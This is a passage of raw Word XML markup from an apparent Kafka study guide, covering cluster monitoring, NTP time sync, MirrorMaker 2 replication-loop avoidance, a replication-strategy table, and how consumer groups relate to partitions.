          <w:numId w:val="174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Kafka Exporter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0B40B9" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Burrow</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for consumer lag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BED96B" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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onitor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A79A0A" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174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lastRenderedPageBreak/>
        <w:t>Replication lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD4600" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174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Consumer offsets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78035C11" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="174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Data throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFF1DC" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1744"/>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essage integrity (checksum validation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171E5E2A" w14:textId="77777777" w:rsidR="00F22E41"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0E00B34">
          <v:rect id="_x0000_i3332" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F318D" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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9. Time Synchronization (NTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC9BDA"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All brokers, producers, and consumers must sync time using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NTP</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2823EBCA" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="174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Ensure correct </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timestamp-based retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05197D07" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1745"/>
        </w:numPr>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aintain event order consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE2473" w14:textId="77777777" w:rsidR="00F22E41"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1A8621">
          <v:rect id="_x0000_i3333" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E291E61" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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10. Avoiding Infinite Replication Loops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F3778"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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic renaming</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication filters</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent MM2 from </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>re-replicating topics back and forth</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FD454" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="004269A3">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A98A1B0">
          <v:rect id="_x0000_i3334" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C017D46" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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71"/>
        <w:gridCol w:w="4037"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="6895E181" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="302FA958" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41"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Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F805050" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
            <w:pPr>
              <w:ind w:left="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="346DA784" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58F906E6"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irrorMaker 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="648A9B1E"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Replicate topics, offsets across clusters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="1A3F39D6" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC02FB8"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Idempotent producers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00F38B9A"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Prevent duplicate messages during retry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="3B1695CB" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="069A84A3"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EOS (Exactly Once Semantics)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70DF218A"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Guarantee message delivery only once</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="364AE6EE" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C7D6921"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chema replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="223715C5"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aintain schema consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5252F8C4" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="728A136C"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Offset sync (MM2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="361803B5"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Seamless consumer failover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="0B3FAE18" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="541E5204"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Active-Passive setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A3D42FD"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Disaster recovery, low conflict</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="0E9C75FA" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25067B74"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Active-Active setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BAD57B"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Load balancing across regions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="2807AFB7" w14:textId="77777777" w:rsidTr="00F22E41">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2366A454"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Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BB004F" w14:textId="77777777" w:rsidR="00F22E41" w:rsidRPr="004269A3" w:rsidRDefault="00F22E41" w:rsidP="004269A3">
            <w:pPr>
              <w:ind w:left="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Detect lag, replication failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4583169F" w14:textId="69880F7F" w:rsidR="00CA2729" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CA2729">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="24BC5EA8">
          <v:rect id="_x0000_i3335" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="597FF0A0" w14:textId="260FC19B" w:rsidR="00CA2729" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA2729" w:rsidP="00CA2729">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="824" w:name="_Toc196308304"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If we have more consumer groups than partitions and how will it manage?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="824"/>
    </w:p>
    <w:p w14:paraId="46A04C5B" w14:textId="2978AB67" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In Kafka, if you have more consumer groups than partitions, each consumer group will independently consume from the topic. Kafka will ensure that each partition is consumed by only one consumer in a given consumer group. However, if there are more consumer groups than partitions, each consumer group will consume the messages from the topic independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E0B44" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here’s how Kafka handles the scenario when you have more consumer groups than partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022D8C3" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Multiple Consumer Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E29F5C" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each consumer group will receive the same set of messages from the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18086331" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka guarantees that each partition is consumed by </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumer in a consumer group at a time. But each consumer group will independently consume from all the partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D20F51" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumer groups, each group will consume from the partitions in parallel, but each group will have its own set of consumers and partition assignments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A258F6" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. More Consumer Groups than Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443BBA98" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more consumer groups than partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, each consumer group will still receive a complete set of messages. The fact that the number of consumer groups exceeds the number of partitions does not cause issues because Kafka handles each consumer group's consumption separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42724245" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
